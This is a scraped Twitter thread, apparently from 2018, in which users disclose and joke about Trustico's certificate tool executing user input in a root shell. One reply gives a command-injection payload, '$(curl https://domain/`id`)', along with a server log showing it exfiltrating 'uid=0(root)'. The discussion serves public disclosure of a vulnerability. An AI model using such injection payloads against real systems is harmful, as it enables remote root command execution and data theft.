@MrTrustico you might want to look at this
Show this thread
Hmmm... I can't validate my Domain certificate via #Trustico, it just ends up sending weird curl requests to my server. 
Anyone got an idea whats wrong?pic.twitter.com/IkvMHZ8aLJ
-
New conversation
-
-
-
Wait. is that doing arbitrary shell command execution?
-
Yup.
-
Holy shit. Are they running something like `curl {$user_input}` or something crazy?!
-
more like "/bin/whatever %USER_INPUT%" which ends up being /bin/whatever $(curl ...) ;)
-
Mental. Out of curiosity, whats the extent of the access this gives? Is it crazy root access, or at least locked down somewhat?
-
it's root lmao
-
This is extremely funny, but also bad
End of conversation
New conversation -
-
-
Wait.. are you serious? They are passing input unfiltered to the shell, and executing it? After the 23K priv keys, I guess I'm not too surprised, but..just..wow.
#security -
*as root
- 1 more reply
New conversation -
-
-
$(curl https://domain/`id`) 35.190.140.214 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0" :D
- 1 more reply
New conversation -
-
- 1 more reply
New conversation -
-
Apparently the CEO made a huge mistake:https://arstechnica.com/information-technology/2018/03/23000-https-certificates-axed-after-ceo-e-mails-private-keys/ …
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
-
-
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.